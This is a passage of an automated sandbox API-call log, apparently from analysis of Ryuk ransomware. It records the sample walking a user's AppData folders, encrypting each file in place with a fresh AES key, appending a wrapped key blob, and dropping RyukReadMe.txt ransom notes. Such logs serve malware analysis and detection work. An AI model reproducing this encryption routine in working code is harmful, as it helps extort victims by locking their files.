out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x1210, lpOverlapped=0x0) returned 1 [0141.946] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0141.946] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.946] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.946] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0141.946] CloseHandle (hObject=0x19c) returned 1 [0141.965] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.969] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.970] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.970] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", dwFileAttributes=0x80) returned 1 [0141.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.971] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=4608) returned 1 [0141.971] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=4608) returned 1 [0141.971] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x10de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.971] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0141.972] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.972] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0141.972] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.972] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.972] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x1200, lpOverlapped=0x0) returned 1 [0141.973] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0141.973] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1200, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1210) returned 1 [0141.973] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.973] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x1210, lpOverlapped=0x0) returned 1 [0141.973] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0141.973] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.973] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.973] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0141.973] CloseHandle (hObject=0x19c) returned 1 [0141.990] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.994] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.994] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.994] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.994] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", dwFileAttributes=0x80) returned 1 [0141.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.995] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=4608) returned 1 [0141.995] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=4608) returned 1 [0141.995] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x10de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.995] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0141.997] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.997] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0141.997] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.997] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.997] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x1200, lpOverlapped=0x0) returned 1 [0141.997] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0141.997] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1200, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1210) returned 1 [0141.997] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.997] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x1210, lpOverlapped=0x0) returned 1 [0141.998] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0141.998] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.998] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.998] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0141.998] CloseHandle (hObject=0x19c) returned 1 [0142.014] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.018] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.018] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.018] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0142.018] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0142.018] SetLastError (dwErrCode=0x0) [0142.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.018] GetLastError () returned 0x0 [0142.019] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.019] CloseHandle (hObject=0x198) returned 1 [0142.019] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0142.019] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0142.020] SetLastError (dwErrCode=0x0) [0142.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.020] GetLastError () returned 0xb7 [0142.020] CloseHandle (hObject=0x194) returned 1 [0142.020] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0142.020] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0142.020] SetLastError (dwErrCode=0x0) [0142.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0142.020] GetLastError () returned 0xb7 [0142.020] CloseHandle (hObject=0x190) returned 1 [0142.020] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0142.020] SetLastError (dwErrCode=0x0) [0142.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0142.020] GetLastError () returned 0xb7 [0142.020] CloseHandle (hObject=0x190) returned 1 [0142.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0142.022] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.022] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.022] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.022] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb", dwFileAttributes=0x80) returned 1 [0142.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.023] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=1069056) returned 1 [0142.023] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=1069056) returned 1 [0142.023] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x104ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.023] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0142.024] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.024] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0142.024] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.024] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.024] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xf4240, lpOverlapped=0x0) returned 1 [0142.052] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240) returned 1 [0142.052] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xf4240) returned 1 [0142.058] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.058] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xf4240, lpOverlapped=0x0) returned 1 [0142.060] SetFilePointer (in: hFile=0x194, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0142.061] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10dc0, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x10dc0, lpOverlapped=0x0) returned 1 [0142.061] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0142.061] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x10dc0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x10dd0) returned 1 [0142.062] SetFilePointer (in: hFile=0x194, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0142.062] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10dd0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x10dd0, lpOverlapped=0x0) returned 1 [0142.062] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0142.062] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0142.062] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0142.062] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0142.062] CloseHandle (hObject=0x194) returned 1 [0142.115] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.119] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.119] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.119] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.119] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.120] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb", dwFileAttributes=0x80) returned 1 [0142.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.120] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=69740) returned 1 [0142.120] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=69740) returned 1 [0142.120] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x10f4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.120] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0142.121] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.122] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0142.122] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.122] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.122] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1106c, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x1106c, lpOverlapped=0x0) returned 1 [0142.123] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0142.123] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x1106c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x11070) returned 1 [0142.124] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.124] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11070, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x11070, lpOverlapped=0x0) returned 1 [0142.124] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0142.124] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0142.124] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0142.124] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0142.124] CloseHandle (hObject=0x194) returned 1 [0142.139] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.143] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.143] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.143] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.143] SetLastError (dwErrCode=0x0) [0142.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.144] GetLastError () returned 0x0 [0142.144] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0142.144] CloseHandle (hObject=0x194) returned 1 [0142.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0142.145] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.145] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.145] SetLastError (dwErrCode=0x0) [0142.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 